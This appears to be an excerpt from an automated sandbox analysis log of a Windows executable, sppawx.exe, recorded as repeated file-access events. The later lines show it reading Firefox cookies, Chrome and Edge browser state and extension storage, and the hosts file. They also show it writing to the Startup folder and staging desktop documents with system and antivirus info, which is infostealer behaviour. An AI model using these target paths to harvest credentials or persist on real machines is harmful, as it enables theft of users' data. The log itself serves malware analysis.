Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \System\Antivirus.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \System\System Info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AIXACVYBSB.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\FACWLRWHGG.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\FACWLRWHGG.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\MQAWXUYAIK.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Queries volume information: C:\Users\user\Desktop\MQAWXUYAIK.pdf VolumeInformation	Jump to behavior
